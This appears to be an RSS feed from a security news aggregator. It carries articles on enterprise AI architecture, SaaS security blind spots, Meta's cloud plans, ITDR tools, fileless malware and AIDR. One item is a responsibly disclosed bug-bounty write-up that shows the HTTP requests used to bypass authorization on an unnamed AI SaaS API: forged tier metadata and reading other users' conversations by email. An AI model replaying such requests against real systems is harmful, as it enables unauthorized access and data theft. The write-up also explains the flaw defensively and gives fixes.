<p class="wp-block-paragraph">Enriching your data inside a vendor’s AI model is the genuinely new question, and organizations that conflate it with their existing cloud posture tend to defend the wrong perimeter.</p>



<p class="wp-block-paragraph">Despite spending around $100 million annually with Amazon, <a href="https://www.uctoday.com/unified-communications/disney-openai-enterprise-strategy/">Disney built its own internal AI system</a> to house its corporate intelligence rather than rely on a hyperscaler’s AI offering. The decision came down to control. When your data represents decades of creative and commercial IP, you think carefully about where it lives and who can learn from it. Disney has become more open to SaaS over time. The AI sovereignty question is a separate debate from the SaaS debate and conflating the two leads organizations to the wrong conclusions.</p>



<p class="wp-block-paragraph">At the other end of the spectrum, enterprises in heavily regulated environments treat data sovereignty as an absolute non-negotiable. Any AI model must run within their controlled environment, especially where sensitive data cannot touch the public internet.<a href="https://gdpr.eu/what-is-gdpr/"> </a><a href="https://gdpr.eu/what-is-gdpr/">GDPR obligations</a> reinforce this instinct across the European market, requiring organizations to maintain clear accountability for how personal data is processed inside AI systems, including vendor-managed ones.</p>



<p class="wp-block-paragraph">AI-enriched data, meaning models that have learned the shape of your business processes, your supplier negotiations, your customer behavior, carries a different half-life and a different strategic value than the operational data underneath it. That deserves its own architectural decision, separate from your broader cloud strategy.<a></a></p>



<h2 class="wp-block-heading">What this means in practice</h2>



<p class="wp-block-paragraph">Most large enterprise estates will end up with a mix of all three approaches, and where you draw the lines matters more than your overall posture.</p>



<p class="wp-block-paragraph">Embedded AI capabilities are the right answer for in-application productivity: the assistant inside your ERP workflows, the agent inside your procurement or HR suite. That is where vendor embedding genuinely shines, and attempting to compose your own equivalent is typically a poor use of engineering resources.</p>



<p class="wp-block-paragraph">Compose belongs elsewhere: in cross-application orchestration, in custom assistants over operational and observability data, and in agents that need to reach across multiple vendor systems and infrastructure layers in ways no single vendor stack will never natively support. <a href="https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/the-top-trends-in-tech">Research from McKinsey</a> suggests the most significant near-term productivity gains from enterprise AI will come precisely from these cross-system workflows, rather than from within individual applications. The most interesting enterprise AI work over the next eighteen months lives here, and it doesn’t require waiting for a migration to complete first.</p>



<p class="wp-block-paragraph">That compose path isn’t free, and it’s important to be honest about the costs. Governance, audit trails, and accountability for hallucinated outputs become your problem, not the vendor’s. Prompt drift and evaluation discipline are real engineering costs that never appear in the proof-of-concept. Those costs scale with the complexity of your landscape and the number of systems your agents touch. Budget for them before deployment, not after your first production incident. None of that is a reason to avoid the path. It’s a reason to staff for it, honestly.<a></a></p>



<h2 class="wp-block-heading">The real question</h2>



<p class="wp-block-paragraph">The build-vs-buy frame survives because it gives executives a binary choice along a familiar axis. AI sits somewhere else entirely.</p>



<p class="wp-block-paragraph">The question worth putting on the table at your next architecture review is simpler:</p>



<p class="wp-block-paragraph">Which decisions do we want our vendors’ AI to make, and which do we want to keep on our side of the boundary?</p>



<p class="wp-block-paragraph">Answer that, and the right build/buy/compose mix flows from it. Skip it, and you will end up with the architecture your vendors prefer – which may or may not be the one your business needs.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The SaaS blind spot: Why security teams can’t get inside their own apps]]></title>
<description><![CDATA[Most organizations I work with have invested heavily in cloud security. They have endpoint detection tools, SIEM platforms, cloud security posture management, and skilled security teams running on a 24/7 shift. And yet, when I ask them a simple question — who has admin access in your Salesforce t...]]></description>
<link>https://tsecurity.de/de/3675559/it-security-nachrichten/the-saas-blind-spot-why-security-teams-cant-get-inside-their-own-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675559/it-security-nachrichten/the-saas-blind-spot-why-security-teams-cant-get-inside-their-own-apps/</guid>
<pubDate>Fri, 17 Jul 2026 11:09:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most organizations I work with have invested heavily in cloud security. They have endpoint detection tools, SIEM platforms, cloud security posture management, and skilled security teams running on a 24/7 shift. And yet, when I ask them a simple question — who has admin access in your Salesforce tenant right now? — The room goes quiet. Nobody knows. Not because they are negligent. Because they genuinely cannot see it.</p>



<p class="wp-block-paragraph">That is the SaaS blind spot.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Figure-1-The-Blind-Spot-and-what-SSPM-covers.png?w=1024" alt="Figure 1: The Blind Spot and what SSPM covers" class="wp-image-4197928" width="1024" height="417" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Figure 1: The Blind Spot and what SSPM covers.</em></figcaption></figure><p class="imageCredit">Ashish Mishra</p></div>



<h2 class="wp-block-heading"><a></a>SaaS: Numbers speak volumes</h2>



<p class="wp-block-paragraph">I ask this question in almost every engagement: how many SaaS applications does your organization run? The answers I get range from 30 to maybe 50. The real number, once someone counts, is usually north of three hundred. <a href="https://appomni.com/press-releases/new-state-of-saas-security-report-2024/">AppOmni’s 2024 research</a> put it even higher — 49% of Microsoft 365 organizations believed they had fewer than ten apps connected to their tenant when the actual average was over a thousand.</p>



<p class="wp-block-paragraph">Here is the part that concerns me more than the count. Of all those applications, security teams have clear sight into maybe one in 10. The rest — where your customer records live, where your source code sits, where your financial reports get shared — nobody is watching. Not because the team is careless. Because the tools they have were never built to look there.</p>



<p class="wp-block-paragraph">The following incidents will discuss these realities.</p>



<h3 class="wp-block-heading"><a></a>Salesforce in 2023</h3>



<p class="wp-block-paragraph">In April 2023, <a href="https://krebsonsecurity.com/2023/04/many-public-salesforce-sites-are-leaking-private-data/">KrebsOnSecurity</a> broke the story — Salesforce Community sites were quietly leaking sensitive data belonging to government agencies, banks, and healthcare providers. No sophisticated attack technique. Just the right API endpoint and a misconfigured guest user profile. The exposed records included Social Security numbers, account details, and home addresses. Salesforce was clear in its response: this was not a platform vulnerability. Administrators had misconfigured guest access policies, and nobody had checked.</p>



<p class="wp-block-paragraph">Guest user profiles in Salesforce Communities can be granted access to data records. When administrators set those permissions too broadly — often without realizing it — unauthenticated external users can query that data straight through the API. Over 150,000 companies were potentially sitting in that window before anyone raised the alarm.</p>



<p class="wp-block-paragraph">The pattern is always the same. Configuration made under time pressure, default set slightly too permissive, nobody looks at it again. SaaS applications accumulate these quiet exposures over months and years.</p>



<h3 class="wp-block-heading"><a></a>GitHub in 2022</h3>



<p class="wp-block-paragraph">In April 2022, <a href="https://github.blog/news-insights/company-news/security-alert-stolen-oauth-user-tokens/">GitHub disclosed</a> that an attacker had used stolen OAuth tokens — issued to Heroku and Travis CI — to access and download private repository contents from dozens of organizations, including npm. GitHub’s own systems were never touched. The tokens came from third-party applications that users had authorized to connect to their accounts, and those applications had been quietly compromised.</p>



<p class="wp-block-paragraph">The entry point was not GitHub. It was not even the organizations that lost their data. It was the CI/CD tools those organizations had connected to GitHub months or years earlier — tools that had been granted broad read and write permissions that were never revisited.</p>



<p class="wp-block-paragraph">That is the OAuth problem in plain terms. The moment you authorize a third-party application; its security posture becomes your problem too. Most organizations have dozens of these connections sitting open across their SaaS platforms — and no one reviewing them.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="496" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><em>Figure 2: The 2022 GitHub breach chain.</em></figcaption></figure><p class="imageCredit">Ashish Mishra</p></div>



<h3 class="wp-block-heading"><a></a>Microsoft in 2023</h3>



<p class="wp-block-paragraph">The Microsoft case from 2023 is the one I bring up when people assume this only happens to careless organizations. <a href="https://www.wiz.io/blog/38-terabytes-of-private-data-accidentally-exposed-by-microsoft-ai-researchers">Wiz Research</a> found that Microsoft’s own AI team had exposed 38TB of internal data — private keys, passwords, and more than 30,000 internal Teams messages — through a single misconfigured Azure access token. The token was supposed to share one training dataset on GitHub. Instead, it opened an entire storage account to anyone who found the link.</p>



<p class="wp-block-paragraph">What gets me about this one is the timeline. That token had been sitting there since October 2021. Nearly two years, inside Microsoft, before anyone caught it. If a team with that level of resources and expertise can leave a door open for two years, the idea that “we’d notice” is not much of a security strategy. And it’s worth noting — this wasn’t a database leak. It was Teams messages. The same collaboration tools your employees use every day are just as exposed as the platforms holding structured records.</p>



<h2 class="wp-block-heading"><a></a>Why traditional security tools miss this</h2>



<p class="wp-block-paragraph">Cloud Security Posture Management tools — CSPM — are designed to monitor infrastructure configuration: virtual machines, storage buckets, network rules, and IAM policies at the infrastructure level. They do an acceptable job at that layer. What they do not do is look inside SaaS applications. <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project">CISA’s Secure Cloud Business Applications (SCuBA) guidance</a> specifically calls out the gap between infrastructure security tools and SaaS-layer visibility as one of the most under addressed areas in enterprise cloud security.</p>



<p class="wp-block-paragraph">This is the gap SSPM was built to close. Instead of watching infrastructure, it watches the configuration of the SaaS applications themselves — permissions, sharing settings, who has access to what. And the distinction is not just academic. Infrastructure misconfigurations tend to expose systems. SaaS misconfigurations tend to expose data — directly, quietly, and often without any detectable attack activity at all.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Figure-3-The-six-core-visibility-capabilities-of-SSPM.png?w=1024" alt="Figure 3: The six core visibility capabilities of SSPM" class="wp-image-4197926" width="1024" height="567" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Figure 3: The six core visibility capabilities of SSPM</em>.</figcaption></figure><p class="imageCredit">Ashish Mishra</p></div>



<h2 class="wp-block-heading"><a></a>What security teams should do now</h2>



<p class="wp-block-paragraph">You do not need to deploy a full SSPM platform tomorrow to start closing the gap. There are practical steps that move the needle immediately.</p>



<ul class="wp-block-list">
<li>Audit connected OAuth applications across your primary SaaS platforms. Revoke any integration that cannot be justified by a current business need.</li>



<li>Common source of public data exposure: Review guest and external sharing permissions in Salesforce Communities and Microsoft SharePoint.</li>



<li>Check whether legacy authentication protocols are disabled in Microsoft 365. Legacy auth bypasses MFA and becomes a potential entry point in enterprise environments.</li>



<li>Establish a quarterly access review for high-privilege accounts in SaaS applications. Most organizations run annual reviews at best — that is not frequent enough for platforms that change configuration daily.</li>



<li>A map of which SaaS applications hold sensitive data, and which have no security team ownership at all. That list will be longer than you expect.</li>
</ul>



<p class="wp-block-paragraph">The core issue is not that organizations are careless. It is that they have built security programs around the perimeter and the infrastructure, and SaaS applications grew up inside that perimeter without ever being brought into scope. The data is there. The access is there. The misconfiguration is often there too. What has been missing is the visibility to see it.</p>



<p class="wp-block-paragraph">SSPM closes that gap. But even before a formal tool is in place, simply asking the question — what can the applications we already run see and share? — is a meaningful first step. In my experience, the answer surprises almost every organization that takes the time to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can Meta really compete in the cloud business?]]></title>
<description><![CDATA[Meta is reportedly planning a cloud business that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customer...]]></description>
<link>https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</guid>
<pubDate>Fri, 17 Jul 2026 11:04:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.bloomberg.com/news/articles/2026-07-01/meta-is-building-a-cloud-business-to-sell-excess-ai-compute">Meta is reportedly planning a cloud business</a> that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customers to access AI models hosted on Meta’s infrastructure and pay based on usage, effectively positioning the company in the <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">infrastructure-as-a-service</a> and AI platform markets. On the surface, this seems like a logical next step. If you are already spending enormous amounts of money to build AI infrastructure, there is a natural temptation to ask whether some of that investment can be monetized beyond your own internal use.</p>



<p class="wp-block-paragraph">I have seen this pattern before. A company builds sophisticated internal systems, recognizes their value, and then begins to imagine that becoming a cloud provider is simply a matter of exposing those capabilities to external customers. It sounds straightforward, especially given the excitement around AI and the demand for high-performance infrastructure. But cloud computing is not just another distribution model. It is not simply a matter of offering on-demand multitenant services and charging a fee. It is a deeply operational, trust-based business in a market that punishes companies that do not fully understand what enterprise customers require.</p>



<h2 class="wp-block-heading">A crowded neocloud market</h2>



<p class="wp-block-paragraph">The first problem Meta faces is that this is not an open opportunity. The <a href="https://www.infoworld.com/article/4140865/neoclouds-run-ai-cheaper-and-better.html">neocloud</a> space, meaning purpose-built AI infrastructure delivered as a service, is already crowded and increasingly difficult to enter. Amazon, Microsoft, and Google dominate the conversation for obvious reasons. They have years of cloud operating experience, broad service portfolios, global reach, mature ecosystems, and deeply established enterprise relationships. Oracle remains a serious player as well, especially in enterprise applications, data platforms, and performance-sensitive workloads. IBM still matters in <a href="https://www.networkworld.com/article/964498/what-is-hybrid-cloud-computing.html">hybrid cloud</a>, operations, and industries where governance and regulatory rigor remain central.</p>



<p class="wp-block-paragraph">That list alone should give Meta pause. These companies are not just infrastructure vendors. They are experienced cloud operators. They have spent years building not only the underlying platforms, but also the native capabilities enterprises now expect by default. Those capabilities include security, governance, identity management, observability, support, compliance, billing controls, resilience planning, and integration with the broader enterprise technology estate. These are not secondary features. They are part of the core value proposition.</p>



<p class="wp-block-paragraph">This is why late entry into the cloud market is so hard. A new provider is not just competing on price or capacity. It is competing against accumulated trust. Enterprises are not casual buyers. They are selecting long-term operating environments for applications, data, AI models, and business-critical processes. They want confidence that the provider understands how these services will be consumed, governed, and supported over time. Meta is entering a market where the incumbents already have a major head start on all of those fronts.</p>



<h2 class="wp-block-heading">Harder than it looks</h2>



<p class="wp-block-paragraph">Over the years, I have had many technology companies come to me and say they wanted to reposition their technology in the cloud space, either as <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">software as a service</a> or infrastructure as a service. In the beginning, enthusiasm is always high. The technology is impressive. The market size looks attractive. The revenue models appear compelling. Investors love the story. Then we begin to walk through what it really means to operate as a cloud provider, and the optimism usually fades fast.</p>



<p class="wp-block-paragraph">The questions become very practical and very uncomfortable. How will tenants be isolated? How will <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity and access controls</a> work across different kinds of customers? What governance models will be built in natively? How will workloads be monitored, optimized, and secured? What does support look like 24 hours a day, across regions, across industries, across compliance boundaries? How will outages be handled, communicated, and remediated? How will the platform integrate with existing customer tools for operations, policy management, and security response? How much investment will it take just to become credible before you even begin to differentiate?</p>



<p class="wp-block-paragraph">Once companies fully understand the complexities, market dynamics, and the capital and execution required to compete even with secondary players, many of them back off. They realize that cloud technology is not a packaging exercise. It is a transformation in how a company designs, operates, supports, sells, and evolves technology. That is why I remain skeptical when any company assumes it can translate internal infrastructure excellence into external cloud success without a very long, disciplined commitment.</p>



<h2 class="wp-block-heading">Meta’s market readiness</h2>



<p class="wp-block-paragraph">Of course, Meta is not lacking in financial resources. If any company can afford to spend aggressively in this space, it is Meta. The company has the capital to build infrastructure, absorb losses, hire experienced talent, and stay in the market long enough to make a serious attempt. I would never argue that Meta is too small or too poor to try. Quite the opposite. If there is any non-traditional entrant with the financial scale to force itself into the conversation, Meta would be high on the list.</p>



<p class="wp-block-paragraph">But money does not erase complexity. It only gives you the chance to confront it. The real question is not whether Meta can afford to become a cloud provider. The question is whether Meta has what it takes to become an <em>excellent </em>cloud provider. Those are two very different things. Enterprises are not going to move meaningful workloads to a new platform simply because the company behind it is wealthy or technically famous. They are going to ask whether the provider understands enterprise consumption patterns, enterprise risk, enterprise governance, and enterprise operations.</p>



<p class="wp-block-paragraph">That is where the challenge becomes much more serious. Meta has extensive experience running infrastructure for itself. That is valuable, but internal operating excellence is not the same thing as external service maturity. Running systems for your own workloads allows a high degree of control over architecture, standards, priorities, and operating assumptions. Running systems for paying customers requires flexibility, consistency, transparency, and support across a wide range of use cases that you do not control. Those are very different disciplines, and companies often underestimate the gap between them.</p>



<h2 class="wp-block-heading">What exactly is Meta?</h2>



<p class="wp-block-paragraph">Another concern here is strategic clarity. Meta already has a complicated market identity. It is a social media company, an advertising platform company, a hardware company, an AI company, and still, in the minds of many, the company that spent billions pursuing the metaverse. If it now wants to be viewed as a serious cloud infrastructure provider, it will need to explain not only what it is offering, but why customers should believe this is a durable long-term commitment and not just another adjacent experiment.</p>



<p class="wp-block-paragraph">That uncertainty can be damaging. Customers want stable providers with clear strategic intent. They do not want to architect important systems around a platform if they suspect the provider may lose interest, shift direction, or reframe the business after a few years of uneven results. Cloud computing requires patience, consistency, and deep customer orientation. It is not a market where strategic ambiguity helps.</p>



<p class="wp-block-paragraph">This could become confusing for Meta internally as well. Building a true cloud business demands focus. It demands years of investment in areas that may not be glamorous but are absolutely necessary, such as governance, operations, controls, support frameworks, partner programs, and enterprise sales alignment. If the company is not willing to make those sacrifices fully and for the long term, the initiative will struggle.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Best Identity Threat Detection and Response (ITDR) Solutions in 2026]]></title>
<description><![CDATA[Identity has become the primary battleground of enterprise cybersecurity. Attackers increasingly bypass traditional defenses by stealing credentials, hijacking sessions, abusing privileged accounts, and exploiting misconfigurations across Active Directory, cloud platforms, SaaS applications, and ...]]></description>
<link>https://tsecurity.de/de/3675509/it-security-nachrichten/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675509/it-security-nachrichten/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/</guid>
<pubDate>Fri, 17 Jul 2026 10:54:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Identity has become the primary battleground of enterprise cybersecurity. Attackers increasingly bypass traditional defenses by stealing credentials, hijacking sessions, abusing privileged accounts, and exploiting misconfigurations across Active Directory, cloud platforms, SaaS applications, and non-human identities. Microsoft reported more than 7,000 password attacks per second in 2024, while compromised credentials remain among the most common—and slowest […]</p>
<p>The post <a href="https://cybersecuritynews.com/best-identity-threat-detection-and-response-solutions/">Top 10 Best Identity Threat Detection and Response (ITDR) Solutions in 2026</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero Credentials, Full Access: Inside a Complete Authorization Failure]]></title>
<description><![CDATA[Bounty Case Files #01How multiple trust-boundary failures allowed anonymous access to premium functionality in a production APIBy Ahmed Waleed | Bug Bounty HunterTL;DRWhile assessing a public enterprise SaaS API, I discovered a complete breakdown of authentication and authorization.By chaining mu...]]></description>
<link>https://tsecurity.de/de/3675345/hacking/zero-credentials-full-access-inside-a-complete-authorization-failure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675345/hacking/zero-credentials-full-access-inside-a-complete-authorization-failure/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:35 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Bounty Case Files #01</h3><p><em>How multiple trust-boundary failures allowed anonymous access to premium functionality in a production API</em></p><p><strong>By </strong><a href="https://www.linkedin.com/in/0x-elfateh/"><strong>Ahmed Waleed</strong> </a><em>| Bug Bounty Hunter</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZT6QyTKTXT-HRslY4EAt4A.png"></figure><h3>TL;DR</h3><p>While assessing a public enterprise SaaS API, I discovered a complete breakdown of authentication and authorization.</p><p>By chaining multiple trust-boundary failures, an unauthenticated attacker could:</p><ul><li><em>Access premium enterprise functionality without authentication.</em></li><li>Impersonate arbitrary users</li><li>Read private conversation history</li><li>Escalate privileges through client-controlled authorization metadata.</li><li>Create, modify, and delete server-side resources</li></ul><p>To respect responsible disclosure, all identifying information has been removed.</p><h3>Target Overview</h3><p>The target was a public AI-powered enterprise platform exposing a documented REST API.</p><p>During reconnaissance I discovered several publicly accessible endpoints:</p><ul><li>/docs</li><li>/redoc</li><li>/openapi.json</li></ul><p>The OpenAPI specification described every available endpoint together with request schemas.</p><p>One thing immediately stood out: the API defined no authentication mechanism whatsoever — no API keys, no OAuth, no Bearer tokens, and no securitySchemes in the OpenAPI specification.</p><h3>Recon</h3><p>Rather than fuzzing hundreds of endpoints, I started by understanding how the application expected clients to communicate.</p><p>The Swagger interface exposed the complete API surface, allowing quick identification of authentication requirements — or in this case, the absence of them. That observation became the starting point for the entire assessment.</p><h3>Technical Walkthrough</h3><p>All requests below were run from a clean browser session with zero credentials, against only a test conversation and a synthetic (non-existent) email address.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/491/1*iFz52SiCWmXCxndPz_Ygog@2x.jpeg"></figure><p><strong>1. Create a conversation — no auth required:</strong></p><pre>POST /conversations<br>Content-Type: application/json <br>{}<br><br><br>→ 200 OK<br>{"status":"success","conversation_id":"conv_...","created_at":"..."}</pre><p><strong>2. Run an enterprise-tier query by just claiming to be enterprise:</strong></p><pre>POST /process<br>Content-Type: application/json<br><br>{<br>  "message": "Show me top brands in TVs on Amazon US by market share",<br>  "conversation_id": "conv_...",<br>  "user_metadata": {<br>    "user_tier": "enterprise",<br>    "permitted_categories": ["All"],<br>    "allowed_retailers": ["All"]<br>  }<br>}<br><br>→ 200 OK — real production analytics data returned, e.g.:<br>Brand A - 35.54% market share - $36.9M GMV - 47,832 units<br>Brand B - 17.81% market share - $18.5M GMV -  8,859 units<br>Brand C -  7.77% market share -  $8.1M GMV - 43,218 units<br></pre><p>The response even included an internal data-source citation confirming it was pulling from the platform’s proprietary intelligence pipeline — not a demo/sandboxed dataset.</p><p><strong>3. Impersonate any customer by email:</strong></p><pre>GET /conversations?user_email=&lt;any-email&gt;<br><br>→ 200 OK — full conversation history for that email address returnedGET /conversations?user_email=&lt;any-email&gt;</pre><p>No verification that the requester <em>is</em> that email address — just supply it and read their history.</p><p>Expected behavior for all three: 401 Unauthorized. Actual: 200 OK, full access.</p><h3><strong>Attack Chain</strong></h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ASZz1mQmnl81UjJjru3pZw.png"></figure><p>Individually, each issue represented a security weakness. Combined, they resulted in a complete authorization failure.</p><h3>Root Cause Analysis</h3><ul><li>Authentication was never enforced</li><li>User identity was trusted from client input</li><li>Authorization relied on client-controlled metadata</li><li>Public API documentation exposed the full attack surface</li><li>Critical authorization decisions occurred entirely on the client side</li></ul><h3>Impact</h3><p>An unauthenticated, remote, anonymous attacker could:</p><ul><li>Consume a paid AI analytics product with zero subscription</li><li>Pull real-time competitive intelligence (pricing, market share, revenue) meant to be a paid enterprise product</li><li>Enumerate/guess customer emails to read private conversation histories</li><li>Escalate from a “demo” tier to “enterprise” by editing a JSON field</li><li>Perform unauthenticated DELETE and PATCH on other users' conversation records — a data-integrity/destruction risk, not just a confidentiality one</li></ul><h3>Suggested Remediation</h3><ol><li>Require real authentication (e.g., validated OAuth/OIDC bearer tokens) on every endpoint; reject unauthenticated calls with 401.</li><li>Derive user identity <strong>only</strong> from the validated token — never from a client-supplied user_email parameter.</li><li>Enforce subscription tier and all permissions <strong>server-side</strong>, from the authenticated principal’s actual entitlements — never trust client-supplied user_metadata.</li><li>Remove or gate /docs, /redoc, and /openapi.json behind auth in production.</li><li>Add per-user rate limiting and audit logging tied to the authenticated identity.</li></ol><h3>Lessons Learned</h3><ul><li>Authentication and authorization solve different problems</li><li>Public API documentation accelerates reconnaissance</li><li>Client-controlled metadata must never influence authorization</li><li>Every permission should be verified on the server</li><li>Multiple low-complexity issues can combine into a critical compromise</li></ul><h3>Responsible Disclosure</h3><p>This issue was reported responsibly through the vendor’s vulnerability disclosure process. The article intentionally omits identifying details, implementation-specific information, and production artifacts.</p><h3>Takeaway</h3><p>An OpenAPI spec with no securitySchemes block and a Swagger UI with no "Authorize" button is a five-second tell that a supposedly "enterprise-grade" AI product may have no server-side authorization at all — identity and entitlement were both being trusted from client-supplied JSON. Worth checking on any AI agent/chatbot API you test: does the <em>server</em> actually verify who you are and what you're allowed to see, or is it just trusting what you tell it?</p><blockquote><em>Next in this series: Bounty Case Files #02</em></blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1607f0cf12ca" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/zero-credentials-full-access-inside-a-complete-authorization-failure-1607f0cf12ca">Zero Credentials, Full Access: Inside a Complete Authorization Failure</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Hide Malware in 364 Environment Variables and Execute It Without Touching the Disk]]></title>
<description><![CDATA[It was first observed targeting a North America-based multinational software and SaaS provider, suggesting that similarly large enterprises could be at risk. Attackers deliver the first-stage Windows Script Host JScript file in a TAR archive disguised as a purchase order. Once opened, the script ...]]></description>
<link>https://tsecurity.de/de/3675233/it-security-nachrichten/hackers-hide-malware-in-364-environment-variables-and-execute-it-without-touching-the-disk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675233/it-security-nachrichten/hackers-hide-malware-in-364-environment-variables-and-execute-it-without-touching-the-disk/</guid>
<pubDate>Fri, 17 Jul 2026 08:38:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It was first observed targeting a North America-based multinational software and SaaS provider, suggesting that similarly large enterprises could be at risk. Attackers deliver the first-stage Windows Script Host JScript file in a TAR archive disguised as a purchase order. Once opened, the script launches a hidden PowerShell process. It prepares an in-memory .NET payload […]</p>
<p>The post <a href="https://cyberpress.org/malware-hides-in-environment-variables/">Hackers Hide Malware in 364 Environment Variables and Execute It Without Touching the Disk</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AIDR: Defining the Next Era of Cybersecurity]]></title>
<description><![CDATA[Author: CrowdStrike - Bewertung: 0x - Views:8 AI is changing how work gets done. It is also creating a new attack surface.

Join CrowdStrike President Michael Sentonas for a first look at CrowdStrike’s vision for securing the agentic enterprise and defining AIDR, the emerging category for detecti...]]></description>
<link>https://tsecurity.de/de/3674789/it-security-video/aidr-defining-the-next-era-of-cybersecurity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674789/it-security-video/aidr-defining-the-next-era-of-cybersecurity/</guid>
<pubDate>Fri, 17 Jul 2026 01:03:10 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: CrowdStrike - Bewertung: 0x - Views:8 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/0KuozkpflQ8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI is changing how work gets done. It is also creating a new attack surface.<br />
<br />
Join CrowdStrike President Michael Sentonas for a first look at CrowdStrike’s vision for securing the agentic enterprise and defining AIDR, the emerging category for detecting, investigating, and responding to threats targeting and originating from AI systems, agents, and autonomous workflows.<br />
<br />
In this virtual event, you’ll learn:<br />
• Why AI agents are reshaping cyber risk<br />
• Why existing security architectures fall short in autonomous environments<br />
• How the endpoint becomes the source of truth for AI activity<br />
• Why AIDR is emerging as the new security model for the AI era<br />
<br />
As AI agents reason, access data, use credentials, invoke tools, and act across endpoints, cloud, and SaaS, security teams need a new way to protect the agentic interaction layer.<br />
<br />
Watch now to see what’s next in cybersecurity.<br />
<br />
Learn more: https://cs.link/urDUr<br />
<br />
📣 Connect With Us:<br />
<br />
► X:<br />
https://twitter.com/CrowdStrike<br />
► Instagram:<br />
https://www.instagram.com/crowdstrike<br />
► LinkedIn:<br />
https://www.linkedin.com/company/crowdstrike<br />
<br />
🔔 Subscribe to stay updated!<br />
<br />
#CrowdStrike #Cybersecurity #AIDR<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China’s Moonshot AI releases Kimi K3, the largest open-source model ever, rivaling top U.S. systems]]></title>
<description><![CDATA[Moonshot AI, the Beijing-based artificial intelligence startup backed by Alibaba, on Thursday released Kimi K3 — a 2.8-trillion-parameter model that the company says is now the largest open-source AI model in the world, and one that benchmarks show performs neck-and-neck with the most powerful pr...]]></description>
<link>https://tsecurity.de/de/3674665/it-nachrichten/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-us-systems/</link>
